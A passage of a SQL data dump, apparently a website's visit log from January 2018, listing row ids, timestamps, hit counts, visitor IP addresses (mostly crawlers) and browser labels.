49.28','other'),(203452,1517237836,1,1,0,0,'54.36.148.252','other'),(203453,1517238210,1,1,0,0,'54.36.149.80','other'),(203454,1517238553,1,1,0,0,'54.36.148.197','other'),(203455,1517238797,1,1,0,0,'54.36.148.202','other'),(203456,1517238844,1,1,0,0,'40.77.167.84','other'),(203457,1517238971,1,1,0,0,'54.36.148.231','other'),(203458,1517238994,1,0,1,0,'66.249.64.29',''),(203459,1517239015,1,1,0,0,'54.36.148.240','other'),(203460,1517239305,1,1,0,0,'54.36.149.107','other'),(203461,1517239771,1,1,0,0,'91.196.178.92','chrome'),(203462,1517239786,1,1,0,0,'91.196.178.162','chrome'),(203463,1517240013,1,1,0,0,'54.36.148.242','other'),(203464,1517240090,1,1,0,0,'54.36.149.89','other'),(203465,1517240194,1,1,0,0,'178.154.171.88','other'),(203466,1517240218,1,1,0,0,'54.36.148.33','other'),(203467,1517240231,1,1,0,0,'51.255.71.123','other'),(203468,1517240468,1,1,0,0,'195.211.174.230','chrome'),(203469,1517240474,1,1,0,0,'216.244.66.246','other'),(203470,1517240698,1,1,0,0,'54.36.149.68','other'),(203471,1517240817,1,1,0,0,'54.36.148.249','other'),(203472,1517240885,1,1,0,0,'91.196.178.162','chrome'),(203473,1517240926,1,0,1,0,'66.249.64.29',''),(203474,1517240978,1,1,0,0,'54.36.148.88','other'),(203475,1517241112,1,1,0,0,'54.36.148.250','other'),(203476,1517241117,2,2,0,0,'54.36.148.138','other'),(203477,1517241241,1,1,0,0,'54.36.149.72','other'),(203478,1517241311,1,1,0,0,'54.36.148.75','other'),(203479,1517241515,1,1,0,0,'207.46.13.181','other'),(203480,1517241771,1,1,0,0,'141.8.142.74','other'),(203481,1517241992,1,1,0,0,'51.255.71.133','other'),(203482,1517242023,1,1,0,0,'54.36.148.110','other'),(203483,1517242062,1,1,0,0,'54.36.148.160','other'),(203484,1517242125,1,1,0,0,'54.36.148.82','other'),(203486,1517242136,1,1,0,0,'54.36.148.17','other'),(203487,1517242468,1,1,0,0,'54.36.148.169','other'),(203488,1517242702,1,1,0,0,'54.36.148.15','other'),(203489,1517242973,1,1,0,0,'54.36.149.16','other'),(203490,1517243026,1,1,0,0,'37.53.80.217','chrome'),(203491,1517243088,1,1,0,0,'37.53.80.217','firefox'),(203492,1517243180,3,3,0,0,'216.244.66.246','other'),(203493,1517243466,1,1,0,0,'54.36.148.151','other'),(203494,1517243729,1,1,0,0,'54.36.149.73','other'),(203495,1517244000,1,1,0,0,'54.36.149.42','other'),(203496,1517244054,2,2,0,0,'216.244.66.194','other'),(203497,1517244059,1,1,0,0,'5.153.140.134','chrome'),(203498,1517244155,1,1,0,0,'54.36.148.247','other'),(203499,1517244234,1,1,0,0,'54.36.148.29','other'),(203500,1517244238,1,1,0,0,'92.112.248.135','chrome'),(203501,1517244287,1,1,0,0,'54.36.149.106','other'),(203502,1517244493,1,1,0,0,'54.36.148.161','other'),(203503,1517244770,1,1,0,0,'54.36.148.49','other'),(203504,1517244877,1,1,0,0,'54.36.149.83','other'),(203505,1517245439,1,1,0,0,'54.36.148.247','other'),(203506,1517246078,1,1,0,0,'54.36.148.93','other'),(203507,1517246250,1,1,0,0,'40.77.167.109','other'),(203508,1517246404,1,1,0,0,'54.36.148.244','other'),(203509,1517246496,1,1,0,0,'54.36.148.134','other'),(203510,1517246503,1,1,0,0,'54.36.148.126','other'),(203511,1517246720,1,1,0,0,'54.36.148.111','other'),(203512,1517246784,1,1,0,0,'54.36.148.28','other'),(203513,1517246876,1,1,0,0,'54.36.148.145','other'),(203514,1517247032,1,1,0,0,'54.36.148.43','other'),(203515,1517247075,1,1,0,0,'54.36.149.6','other'),(203516,1517247132,1,1,0,0,'54.36.149.85','other'),(203517,1517247144,1,1,0,0,'8.29.198.25','other'),(203518,1517247447,1,1,0,0,'54.36.148.44','other'),(203519,1517247451,1,0,1,0,'66.249.64.29',''),(203520,1517247456,5,5,0,0,'216.244.66.194','other'),(203521,1517247495,1,1,0,0,'51.255.71.132','other'),(203522,1517247588,1,1,0,0,'54.36.148.158','other'),(203523,1517247715,1,1,0,0,'51.255.71.116','other'),(203524,1517248123,1,1,0,0,'54.36.148.30','other'),(203525,1517248267,2,2,0,0,'54.36.149.57','other'),(203526,1517248511,1,1,0,0,'141.8.142.74','other'),(203527,1517248911,1,1,0,0,'54.36.149.72','other'),(203528,1517248912,1,1,0,0,'54.36.149.41','other'),(203529,1517249702,1,1,0,0,'54.36.149.84','other'),(203530,1517249922,1,1,0,0,'54.36.149.95','other'),(203531,1517249955,1,1,0,0,'54.36.149.78','other'),(203532,1517249993,1,1,0,0,'80.252.154.233','firefox'),(203533,1517250021,1,1,0,0,'87.250.224.46','other'),(203534,1517250131,1,1,0,0,'54.36.149.69','other'),(203535,1517250301,1,1,0,0,'54.36.148.71','other'),(203536,1517250738,2,2,0,0,'216.244.66.246','other'),(203537,1517250765,1,1,0,0,'54.36.148.89','other'),(203538,1517251063,1,1,0,0,'51.255.71.125','other'),(203539,1517251357,1,1,0,0,'54.36.148.245','other'),(203540,1517251557,1,1,0,0,'54.36.148.190','other'),(203541,1517251808,1,1,0,0,'91.196.178.162','chrome'),(203542,1517251821,1,1,0,0,'54.36.148.149','other'),(203543,1517251838,2,2,0,0,'54.36.148.146','other'),(203544,1517251892,1,1,0,0,'54.36.149.71','other'),(203545,1517252133,1,1,0,0,'54.36.149.46','other'),(203546,1517252269,1,1,0,0,'54.36.148.95','other'),(203547,1517252507,1,1,0,0,'54.36.149.4','other'),(203548,1517252529,1,1,0,0,'54.36.149.21','other'),(203549,1517252695,1,1,0,0,'188.230.43.254','other'),(203550,1517253044,1,0,1,0,'66.249.64.29',''),(203551,1517253052,1,1,0,0,'54.36.148.74','other'),(203552,1517253119,1,1,0,0,'54.36.148.78','other'),(203553,1517253142,1,1,0,0,'51.255.71.115','other'),(203554,1517253277,1,1,0,0,'54.36.149.43','other'),(203555,1517253518,1,1,0,0,'54.36.148.128','other'),(203556,1517253573,1,1,0,0,'91.196.178.103','other'),(203557,1517253739,1,1,0,0,'54.36.149.53','other'),(203558,1517253967,1,1,0,0,'54.36.149.62','other'),(203559,1517254041,1,1,0,0,'216.244.66.246','other'),(203560,1517254237,1,1,0,0,'54.36.149.21','other'),(203561,1517254272,1,1,0,0,'54.36.148.245','other'),(203562,1517254366,1,1,0,0,'54.36.149.84','other'),(203563,1517254457,1,1,0,0,'54.36.148.104','other'),(203564,1517254984,1,0,1,0,'66.249.64.29',''),(203565,1517255079,1,1,0,0,'54.36.149.81','other'),(203566,1517255097,1,1,0,0,'188.230.43.254','other'),(203567,1517255160,1,1,0,0,'54.36.148.57','other'),(203568,1517255407,1,1,0,0,'51.255.71.120','other'),(203569,1517255465,1,1,0,0,'54.36.149.59','other'),(203570,1517255467,1,1,0,0,'40.77.167.109','other'),(203571,1517255478,1,1,0,0,'54.36.148.161','other'),(203572,1517255716,1,1,0,0,'54.36.148.136','other'),(203573,1517256103,1,1,0,0,'54.36.149.35','other'),(203574,1517256105,1,1,0,0,'91.196.178.8','chrome'),(203575,1517256342,1,1,0,0,'54.36.149.0','other'),(203576,1517256474,1,1,0,0,'54.36.149.95','other'),(203577,1517256486,1,1,0,0,'54.36.148.185','other'),(203578,1517256530,1,1,0,0,'54.36.148.48','other'),(203579,1517256593,1,1,0,0,'54.36.148.166','other'),(203580,1517256633,1,1,0,0,'54.36.148.193','other'),(203581,1517256764,1,1,0,0,'178.154.171.88','other'),(203582,1517256887,2,2,0,0,'216.244.66.194','other'),(203583,1517256965,1,1,0,0,'54.36.148.121','other'),(203584,1517256984,1,1,0,0,'54.36.149.58','other'),(203585,1517257007,1,1,0,0,'54.36.148.41','other'),(203586,1517257349,1,1,0,0,'54.36.149.0','other'),(203587,1517257494,1,1,0,0,'188.230.43.254','other'),(203588,1517257657,1,1,0,0,'54.36.149.63','other'),(203589,1517257807,1,1,0,0,'54.36.148.206','other'),(203590,1517257944,1,1,0,0,'54.36.148.137','other'),(203591,1517257952,1,1,0,0,'54.36.148.120','other'),(203592,1517257984,1,1,0,0,'8.29.198.25','other'),(203593,1517258028,1,1,0,0,'54.36.148.72','other'),(203594,1517258082,1,1,0,0,'54.36.148.238','other'),(203595,1517258088,1,1,0,0,'54.36.149.95','other'),(203596,1517258270,1,1,0,0,'178.154.171.88','other'),(203597,1517258472,1,1,0,0,'54.36.149.72','other'),(203598,1517258681,1,1,0,0,'54.36.149.50','other'),(203599,1517258777,1,1,0,0,'54.36.148.197','other'),(203600,1517258874,1,0,1,0,'66.249.64.29',''),(203601,1517259231,2,0,2,0,'66.249.64.30',''),(203602,1517259541,1,1,0,0,'54.36.149.66','other'),(203603,1517259574,1,1,0,0,'54.36.148.173','other'),(203604,1517259890,1,1,0,0,'188.230.43.254','other'),(203605,1517259895,1,1,0,0,'54.36.148.13','other'),(203606,1517260067,3,3,0,0,'216.244.66.246','other'),(203607,1517260079,1,1,0,0,'54.36.149.15','other'),(203608,1517260312,1,1,0,0,'54.36.149.39','other'),(203609,1517260416,1,0,1,0,'66.249.64.30',''),(203610,1517260554,1,1,0,0,'54.36.148.193','other'),(203611,1517261041,1,1,0,0,'54.36.149.62','other'),(203612,1517261068,1,1,0,0,'54.36.149.87','other'),(203613,1517261080,1,1,0,0,'54.36.149.50','other'),(203614,1517261122,1,1,0,0,'54.36.149.91','other'),(203615,1517261811,1,1,0,0,'51.255.71.117','other'),(203616,1517261892,1,1,0,0,'54.36.148.51','other'),(203617,1517262072,1,1,0,0,'54.36.148.74','other'),(203618,1517262289,1,1,0,0,'54.36.149.41','other'),(203619,1517262868,1,1,0,0,'54.36.149.10','other'),(203620,1517263265,1,1,0,0,'54.36.148.159','other'),(203621,1517263571,1,1,0,0,'54.36.148.47','other'),(203622,1517263700,2,2,0,0,'216.244.66.246','other'),(203623,1517263731,1,1,0,0,'54.36.148.253','other'),(203624,1517263812,1,1,0,0,'91.209.11.236','other'),(203625,1517263878,2,0,2,0,'66.249.64.29',''),(203626,1517263879,1,1,0,0,'54.36.148.104','other'),(203627,1517263896,1,1,0,0,'87.250.224.46','other'),(203628,1517263981,5,5,0,0,'216.244.66.194','other'),(203629,1517264015,1,1,0,0,'54.36.149.51','other'),(203630,1517264101,1,1,0,0,'54.36.148.75','other'),(203631,1517264418,1,1,0,0,'54.36.148.131','other'),(203632,1517264675,1,1,0,0,'54.36.149.39','other'),(203633,1517264924,1,1,0,0,'54.36.148.205','other'),(203634,1517265098,1,1,0,0,'5.255.253.35','other'),(203635,1517265120,1,1,0,0,'54.36.148.142','other'),(203636,1517265133,1,1,0,0,'178.154.200.28','other'),(203637,1517265251,1,1,0,0,'51.255.71.126','other'),(203638,1517265509,1,1,0,0,'40.77.167.84','other'),(203639,1517265703,1,1,0,0,'54.36.149.63','other'),(203640,1517265882,1,1,0,0,'54.36.148.201','other'),(203641,1517265883,2,2,0,0,'54.36.148.235','other'),(203642,1517265907,1,1,0,0,'54.36.148.182','other'),(203643,1517265933,1,1,0,0,'141.8.142.126','other'),(203644,1517266129,1,1,0,0,'54.36.148.77','other'),(203645,1517266134,1,1,0,0,'54.36.149.19','other'),(203646,1517266238,1,1,0,0,'188.42.35.176','chrome'),(203647,1517266413,2,2,0,0,'178.154.200.8','other'),(203648,1517266845,2,2,0,0,'216.244.66.194','other'),(203649,1517266909,1,1,0,0,'54.36.148.186','other'),(203650,1517267815,1,1,0,0,'54.36.149.100','other'),(203651,1517267869,1,1,0,0,'54.36.148.96','other'),(203652,1517268827,1,1,0,0,'8.29.198.27','other'),(203653,1517268858,1,1,0,0,'54.36.148.72','other'),(203654,1517268901,1,1,0,0,'40.77.167.51','other'),(203655,1517269351,2,2,0,0,'216.244.66.246','other'),(203656,1517269379,1,1,0,0,'54.36.148.67','other'),(203657,1517269529,1,1,0,0,'87.250.224.39','other'),(203658,1517270298,1,1,0,0,'54.36.149.95','other'),(203659,1517270691,1,1,0,0,'54.36.148.183','other'),(203660,1517270805,1,1,0,0,'54.36.149.28','other'),(203661,1517271085,1,1,0,0,'54.36.148.15','other'),(203662,1517271128,1,1,0,0,'54.36.149.63','other'),(203663,1517271197,1,1,0,0,'54.36.148.237','other'),(203664,1517271203,1,1,0,0,'54.36.148.139','other'),(203665,1517271279,1,1,0,0,'54.36.149.85','other'),(203666,1517271339,1,1,0,0,'54.36.149.90','other'),(203667,1517271340,1,1,0,0,'54.36.149.82','other'),(203668,1517271432,1,1,0,0,'54.36.148.96','other'),(203669,1517271663,1,1,0,0,'54.36.148.169','other'),(203670,1517271770,1,1,0,0,'54.36.149.0','other'),(203671,1517272264,1,1,0,0,'54.36.148.166','other'),(203672,1517272994,1,1,0,0,'54.36.148.98','other'),(203673,1517273075,1,1,0,0,'54.36.148.36','other'),(203674,1517273282,1,1,0,0,'87.250.224.66','other'),(203675,1517273457,1,1,0,0,'54.36.149.8','other'),(203676,1517273717,3,3,0,0,'216.244.66.194','other'),(203677,1517273879,1,1,0,0,'54.36.148.249','other'),(203678,1517274201,1,1,0,0,'54.36.148.172','other'),(203679,1517274247,1,1,0,0,'54.36.148.185','other'),(203680,1517274383,1,1,0,0,'37.9.113.134','other'),(203681,1517274385,1,1,0,0,'54.36.148.62','other'),(203682,1517274418,1,1,0,0,'54.36.148.47','other'),(203683,1517274812,1,1,0,0,'178.154.200.8','other'),(203684,1517274893,1,1,0,0,'37.9.113.63','other'),(203685,1517274908,1,1,0,0,'54.36.148.66','other'),(203686,1517275142,3,3,0,0,'216.244.66.246','other'),(203687,1517275167,1,1,0,0,'54.36.148.28','other'),(203688,1517275792,1,1,0,0,'213.180.203.8','other'),(203689,1517276072,1,1,0,0,'54.36.148.77','other'),(203690,1517276468,1,1,0,0,'54.36.148.165','other'),(203691,1517276634,1,1,0,0,'54.36.148.250','other'),(203692,1517276729,1,1,0,0,'54.36.148.242','other'),(203693,1517276751,1,1,0,0,'216.244.66.194','other'),(203694,1517276917,1,1,0,0,'54.36.148.95','other'),(203695,1517277304,1,1,0,0,'54.36.148.94','other'),(203696,1517277566,2,2,0,0,'199.58.86.209','other'),(203697,1517277579,1,1,0,0,'40.77.167.84','other'),(203698,1517277795,1,1,0,0,'54.36.149.55','other'),(203699,1517277905,1,1,0,0,'54.36.148.186','other'),(203700,1517278344,1,1,0,0,'54.36.148.182','other'),(203701,1517278517,2,2,0,0,'216.244.66.246','other'),(203702,1517279233,1,1,0,0,'51.255.71.119','other'),(203703,1517279294,1,1,0,0,'54.36.148.25','other'),(203704,1517279308,1,1,0,0,'54.36.149.50','other'),(203705,1517279670,1,1,0,0,'8.29.198.26','other'),(203706,1517279847,1,1,0,0,'178.154.171.60','other'),(203707,1517279954,1,1,0,0,'54.36.148.166','other'),(203708,1517280235,1,1,0,0,'54.36.149.26','other'),(203709,1517280241,1,1,0,0,'54.36.148.11','other'),(203710,1517280496,1,1,0,0,'54.36.149.89','other'),(203711,1517280858,3,3,0,0,'40.77.167.109','other'),(203712,1517280986,1,1,0,0,'54.36.149.41','other'),(203713,1517281063,1,1,0,0,'54.36.148.242','other'),(203714,1517281072,1,1,0,0,'54.36.148.115','other'),(203715,1517281182,1,1,0,0,'54.36.148.91','other'),(203716,1517281203,1,1,0,0,'54.36.148.14','other'),(203717,1517281274,1,1,0,0,'54.36.148.137','other'),(203718,1517281374,1,1,0,0,'54.36.149.64','other'),(203719,1517281437,1,1,0,0,'178.154.171.10','other'),(203720,1517281764,1,1,0,0,'54.36.149.90','other'),(203721,1517281828,1,1,0,0,'137.74.207.170','other'),(203722,1517281882,1,1,0,0,'54.36.148.157','other'),(203723,1517282134,1,1,0,0,'54.36.148.252','other'),(203724,1517282414,1,1,0,0,'54.36.148.61','other'),(203725,1517282607,1,1,0,0,'54.36.148.79','other'),(203726,1517282752,1,1,0,0,'54.36.148.39','other'),(203727,1517282804,1,0,1,0,'68.180.229.52',''),(203728,1517282817,1,1,0,0,'54.36.149.92','other'),(203729,1517282887,1,1,0,0,'54.36.148.21','other'),(203730,1517282977,1,1,0,0,'37.9.113.100','other'),(203731,1517282996,1,1,0,0,'54.36.148.91','other'),(203732,1517283114,1,1,0,0,'51.255.71.133','other'),(203733,1517283154,1,1,0,0,'54.36.149.52','other'),(203734,1517283223,1,1,0,0,'54.36.148.249','other'),(203735,1517283440,1,1,0,0,'51.255.71.113','other'),(203736,1517283656,1,1,0,0,'54.36.149.21','other'),(203737,1517283662,1,1,0,0,'54.36.148.109','other'),(203738,1517283695,1,1,0,0,'54.36.149.13','other'),(203739,1517283722,1,0,1,0,'66.249.64.15',''),(203740,1517283857,1,1,0,0,'54.36.149.91','other'),(203741,1517284165,1,1,0,0,'216.244.66.237','other'),(203742,1517284500,3,3,0,0,'216.244.66.194','other'),(203743,1517284654,1,1,0,0,'54.36.149.85','other'),(203744,1517284759,1,1,0,0,'54.36.149.28','other'),(203745,1517284805,1,1,0,0,'88.198.0.163','other'),(203746,1517285231,1,1,0,0,'54.36.149.88','other'),(203747,1517285415,1,1,0,0,'51.255.71.119','other'),(203748,1517285499,2,2,0,0,'54.36.148.201','other'),(203749,1517285503,1,1,0,0,'54.36.148.229','other'),(203750,1517285730,1,1,0,0,'54.36.148.30','other'),(203751,1517285978,3,3,0,0,'216.244.66.246','other'),(203752,1517286333,1,1,0,0,'54.36.149.22','other'),(203753,1517286557,1,1,0,0,'54.36.149.21','other'),(203754,1517286784,1,1,0,0,'66.249.64.15','chrome'),(203755,1517286928,1,1,0,0,'54.36.149.75','other'),(203756,1517286963,1,1,0,0,'54.36.149.44','other'),(203757,1517287080,1,1,0,0,'54.36.148.126','other'),(203758,1517287178,3,3,0,0,'216.244.66.194','other'),(203759,1517287214,1,1,0,0,'54.36.148.230','other'),(203760,1517287266,1,1,0,0,'54.36.148.182','other'),(203761,1517287475,1,1,0,0,'54.36.148.47','other'),(203762,1517287715,1,1,0,0,'54.36.149.10','other'),(203763,1517287735,1,1,0,0,'51.255.71.131','other'),(203764,1517288060,1,1,0,0,'35.153.67.216','other'),(203765,1517288260,1,1,0,0,'216.244.66.246','other'),(203766,1517288685,1,1,0,0,'54.36.148.69','other'),(203767,1517288750,1,1,0,0,'51.255.71.127','other'),(203768,1517288983,1,1,0,0,'35.153.67.216','other'),(203769,1517289080,1,0,1,0,'66.249.64.71',''),(203770,1517289407,1,1,0,0,'54.36.148.58','other'),(203771,1517289585,1,0,1,0,'66.249.64.13',''),(203772,1517289589,1,1,0,0,'54.36.148.232','other'),(203773,1517289678,1,1,0,0,'37.9.113.110','other'),(203774,1517289817,1,1,0,0,'54.36.148.102','other'),(203775,1517289904,1,1,0,0,'35.153.67.216','other'),(203776,1517289965,1,1,0,0,'54.36.148.105','other'),(203777,1517290104,1,0,1,0,'66.249.64.71',''),(203778,1517290414,1,1,0,0,'141.8.132.22','other'),(203779,1517290508,1,1,0,0,'8.29.198.27','other'),(203780,1517290708,1,1,0,0,'5.45.207.83','other'),(203781,1517290814,1,1,0,0,'35.153.67.216','other'),(203782,1517291194,1,1,0,0,'37.9.113.132','other'),(203783,1517291293,1,0,1,0,'66.249.64.71',''),(203784,1517291327,1,1,0,0,'54.36.148.111','other'),(203785,1517291332,1,1,0,0,'54.36.149.23','other'),(203786,1517291345,1,1,0,0,'54.36.149.31','other'),(203787,1517291357,1,1,0,0,'54.36.148.153','other'),(203788,1517291415,1,1,0,0,'54.36.148.230','other'),(203789,1517291436,1,1,0,0,'40.77.167.84','other'),(203790,1517291472,2,2,0,0,'5.105.143.32','chrome'),(203791,1517291520,1,0,1,0,'68.180.229.52',''),(203792,1517291553,1,1,0,0,'54.36.149.22','other'),(203793,1517291561,1,1,0,0,'54.36.148.89','other'),(203794,1517291654,1,1,0,0,'141.8.142.74','other'),(203795,1517291693,1,1,0,0,'54.36.148.120','other'),(203796,1517291728,1,1,0,0,'35.153.67.216','other'),(203797,1517291731,1,1,0,0,'54.36.148.109','other'),(203798,1517291785,1,1,0,0,'54.36.149.64','other'),(203799,1517291982,1,1,0,0,'66.249.64.73','chrome'),(203800,1517292307,1,1,0,0,'54.36.148.197','other'),(203801,1517292479,1,1,0,0,'54.36.148.49','other'),(203802,1517292521,1,1,0,0,'54.36.148.161','other'),(203803,1517292524,1,1,0,0,'54.36.148.54','other'),(203804,1517292638,1,1,0,0,'35.153.67.216','other'),(203805,1517292675,1,1,0,0,'54.36.149.102','other'),(203806,1517293566,1,1,0,0,'35.153.67.216','other'),(203807,1517293591,1,1,0,0,'37.55.186.180','chrome'),(203808,1517293711,1,0,1,0,'66.249.64.71',''),(203809,1517294043,1,1,0,0,'54.36.148.30','other'),(203810,1517294508,1,1,0,0,'35.153.67.216','other'),(203811,1517294598,8,8,0,0,'216.244.66.194','other'),(203812,1517295104,1,1,0,0,'54.36.148.239','other'),(203813,1517295422,1,1,0,0,'54.36.149.50','other'),(203814,1517295524,1,1,0,0,'216.244.66.246','other'),(203815,1517295546,1,1,0,0,'35.153.67.216','other'),(203816,1517295554,1,1,0,0,'54.36.148.80','other'),(203817,1517295647,1,1,0,0,'54.36.148.100','other'),(203818,1517295746,1,1,0,0,'180.76.15.147','other'),(203819,1517295822,1,1,0,0,'54.36.149.107','other'),(203820,1517295857,1,1,0,0,'54.36.148.70','other'),(203821,1517296224,1,1,0,0,'54.36.149.27','other'),(203822,1517296479,1,1,0,0,'35.153.67.216','other'),(203823,1517296820,1,0,1,0,'66.249.64.73',''),(203824,1517297021,1,1,0,0,'95.47.148.27','firefox'),(203825,1517297103,1,1,0,0,'204.79.180.4','msie'),(203826,1517297212,1,1,0,0,'216.244.66.194','other'),(203827,1517297343,1,1,0,0,'54.36.149.79','other'),(203828,1517297351,1,1,0,0,'91.196.178.65','chrome'),(203829,1517297422,1,1,0,0,'35.153.67.216','other'),(203830,1517297442,1,1,0,0,'54.36.148.42','other'),(203831,1517297674,1,0,1,0,'68.180.229.52',''),(203832,1517297736,1,0,1,0,'66.249.64.71',''),(203833,1517297866,1,1,0,0,'37.9.113.115','other'),(203834,1517297991,1,1,0,0,'5.45.207.82','other'),(203835,1517298004,1,1,0,0,'91.196.178.92','chrome'),(203836,1517298022,1,1,0,0,'54.36.148.141','other'),(203837,1517298023,1,1,0,0,'195.230.119.34','chrome'),(203838,1517298121,1,1,0,0,'37.9.113.60','other'),(203839,1517298162,1,1,0,0,'54.36.148.77','other'),(203840,1517298171,1,1,0,0,'216.244.66.246','other'),(203841,1517298183,1,1,0,0,'51.255.71.117','other'),(203842,1517298201,1,1,0,0,'54.36.148.233','other'),(203843,1517298360,1,1,0,0,'54.36.148.99','other'),(203844,1517298882,1,1,0,0,'54.36.148.39','other'),(203845,1517298956,1,1,0,0,'35.153.67.216','other'),(203846,1517299288,1,1,0,0,'54.36.148.94','other'),(203847,1517299346,1,1,0,0,'37.9.113.115','other'),(203848,1517299750,1,1,0,0,'54.36.148.11','other'),(203849,1517299835,1,1,0,0,'128.69.232.58','msie'),(203850,1517300265,1,1,0,0,'54.36.148.77','other'),(203851,1517300310,1,1,0,0,'54.36.148.61','other'),(203852,1517300351,1,1,0,0,'54.36.148.111','other'),(203853,1517300452,1,0,1,0,'66.249.64.67',''),(203854,1517300612,1,1,0,0,'54.36.149.32','other'),(203855,1517300622,1,1,0,0,'54.36.149.64','other'),(203856,1517300651,1,1,0,0,'91.196.178.166','chrome'),(203857,1517301137,1,1,0,0,'128.199.63.237','chrome'),(203858,1517301234,1,1,0,0,'54.36.149.14','other'),(203859,1517301327,1,1,0,0,'35.153.67.216','other'),(203860,1517301340,1,1,0,0,'8.29.198.27','other'),(203861,1517301424,1,1,0,0,'77.111.244.61','chrome'),(203862,1517301550,1,1,0,0,'54.36.148.199','other'),(203863,1517301654,1,1,0,0,'54.36.148.239','other'),(203864,1517301658,1,1,0,0,'87.250.224.39','other'),(203865,1517301707,1,1,0,0,'54.36.148.197','other'),(203866,1517301979,1,1,0,0,'54.36.149.85','other'),(203867,1517302311,1,1,0,0,'178.92.159.87','firefox'),(203868,1517302465,1,1,0,0,'35.153.67.216','other'),(203869,1517302514,1,1,0,0,'88.198.16.12','other'),(203870,1517302630,1,1,0,0,'176.214.50.200','chrome'),(203871,1517302655,1,1,0,0,'54.36.148.51','other'),(203872,1517302764,1,1,0,0,'54.36.148.118','other'),(203873,1517302836,1,1,0,0,'54.36.148.84','other'),(203874,1517302930,1,1,0,0,'54.36.148.163','other'),(203875,1517303106,1,1,0,0,'54.36.148.131','other'),(203876,1517303246,1,1,0,0,'54.36.149.65','other'),(203877,1517303291,1,0,1,0,'66.249.64.67',''),(203878,1517303502,1,1,0,0,'54.36.149.17','other'),(203879,1517303526,2,2,0,0,'54.36.148.232','other'),(203880,1517303710,1,1,0,0,'141.8.142.123','other'),(203881,1517304002,5,5,0,0,'216.244.66.194','other'),(203882,1517304009,1,1,0,0,'5.105.174.101','firefox'),(203883,1517304141,1,1,0,0,'54.36.149.24','other'),(203884,1517304706,1,1,0,0,'54.36.148.162','other'),(203885,1517304935,1,1,0,0,'54.36.148.72','other'),(203886,1517304960,1,1,0,0,'54.36.148.64','other'),(203887,1517305101,1,1,0,0,'54.36.148.89','other'),(203888,1517305111,1,1,0,0,'54.36.149.89','other'),(203889,1517305549,2,2,0,0,'216.244.66.246','other'),(203890,1517305553,1,1,0,0,'54.36.148.146','other'),(203891,1517306067,1,1,0,0,'54.36.148.60','other'),(203892,1517306152,1,1,0,0,'141.8.132.19','other'),(203893,1517306197,1,1,0,0,'54.36.148.112','other'),(203894,1517306346,1,1,0,0,'66.249.64.73','chrome'),(203895,1517306390,1,1,0,0,'37.53.230.125','firefox'),(203896,1517306452,1,1,0,0,'54.36.148.157','other'),(203897,1517306518,5,5,0,0,'216.244.66.194','other'),(203898,1517306528,1,1,0,0,'54.36.148.64','other'),(203899,1517306644,1,1,0,0,'54.36.149.12','other'),(203900,1517306723,16,16,0,0,'95.91.13.15','other'),(203901,1517306772,23,23,0,0,'91.137.17.202','other'),(203902,1517306873,2,2,0,0,'91.209.11.236','other'),(203903,1517306889,1,1,0,0,'54.36.149.9','other'),(203904,1517306931,1,0,1,0,'66.249.64.67',''),(203905,1517307044,1,1,0,0,'54.36.148.191','other'),(203906,1517307067,1,1,0,0,'35.153.67.216','other'),(203907,1517307089,1,1,0,0,'54.36.148.38','other'),(203908,1517307097,1,1,0,0,'54.36.149.41','other'),(203909,1517307117,1,1,0,0,'54.36.148.127','other'),(203910,1517307128,1,1,0,0,'54.36.148.158','other'),(203911,1517307210,2,2,0,0,'40.77.167.97','other'),(203912,1517307215,1,1,0,0,'54.36.149.22','other'),(203913,1517307404,1,1,0,0,'54.36.148.100','other'),(203914,1517307511,3,3,0,0,'40.77.167.114','other'),(203915,1517307512,4,4,0,0,'40.77.167.113','other'),(203916,1517307589,1,1,0,0,'37.9.113.138','other'),(203917,1517307680,1,1,0,0,'54.36.148.177','other'),(203918,1517307791,1,0,1,0,'66.249.64.71',''),(203919,1517307909,1,1,0,0,'107.178.194.247','msie'),(203920,1517307919,1,1,0,0,'77.40.129.123','firefox'),(203921,1517308072,1,1,0,0,'52.200.221.20','msie'),(203922,1517308088,1,1,0,0,'50.112.194.65','msie'),(203923,1517308138,1,1,0,0,'54.36.149.42','other'),(203924,1517308245,1,1,0,0,'51.255.71.120','other'),(203925,1517308394,136,136,0,0,'79.143.185.25','other'),(203926,1517308597,1,1,0,0,'54.36.148.159','other'),(203927,1517308620,1,1,0,0,'178.94.254.120','chrome'),(203928,1517308912,5,5,0,0,'216.244.66.246','other'),(203929,1517308924,1,1,0,0,'54.36.148.85','other'),(203930,1517308936,1,1,0,0,'54.36.148.235','other'),(203931,1517308946,1,1,0,0,'54.36.148.230','other'),(203932,1517308975,1,1,0,0,'91.196.178.168','chrome'),(203933,1517309135,1,1,0,0,'54.36.148.180','other'),(203934,1517309249,1,1,0,0,'54.36.149.80','other'),(203935,1517309297,43,43,0,0,'79.143.185.25','other'),(203936,1517309432,1,1,0,0,'35.153.67.216','other'),(203937,1517309604,1,1,0,0,'196.247.224.226','other'),(203938,1517309631,1,1,0,0,'54.36.148.62','other'),(203939,1517309656,1,1,0,0,'37.9.113.138','other'),(203940,1517309677,1,1,0,0,'207.46.13.181','other'),(203941,1517309770,1,1,0,0,'78.111.190.226','chrome'),(203942,1517309775,1,1,0,0,'46.133.221.217','chrome'),(203943,1517309848,1,1,0,0,'54.36.148.231','other'),(203944,1517310044,1,1,0,0,'54.36.149.62','other'),(203945,1517310101,1,1,0,0,'176.228.200.35','chrome'),(203946,1517310175,1,1,0,0,'54.36.148.239','other'),(203947,1517310194,1,1,0,0,'54.36.148.254','other'),(203948,1517310311,2,2,0,0,'54.36.149.54','other'),(203949,1517310637,1,1,0,0,'54.36.149.80','other'),(203950,1517310899,1,1,0,0,'54.36.149.58','other'),(203951,1517310905,1,1,0,0,'35.153.67.216','other'),(203952,1517310970,1,1,0,0,'54.36.148.134','other'),(203953,1517311116,1,1,0,0,'54.36.148.161','other'),(203954,1517311318,1,1,0,0,'91.204.84.93','chrome'),(203955,1517311473,1,1,0,0,'54.36.149.76','other'),(203956,1517311474,1,0,1,0,'66.249.64.71',''),(203957,1517312115,1,1,0,0,'54.36.148.234','other'),(203958,1517312181,1,1,0,0,'8.29.198.27','other'),(203959,1517312761,1,1,0,0,'91.196.178.129','firefox'),(203960,1517312947,1,1,0,0,'95.134.62.255','chrome'),(203961,1517313252,1,1,0,0,'54.36.149.58','other'),(203962,1517313431,1,1,0,0,'54.36.148.230','other'),(203963,1517313750,1,1,0,0,'35.153.67.216','other'),(203964,1517313859,6,6,0,0,'216.244.66.194','other'),(203965,1517314415,1,1,0,0,'178.154.171.10','other'),(203966,1517314579,1,1,0,0,'54.36.148.147','other'),(203967,1517314612,1,1,0,0,'54.36.149.36','other'),(203968,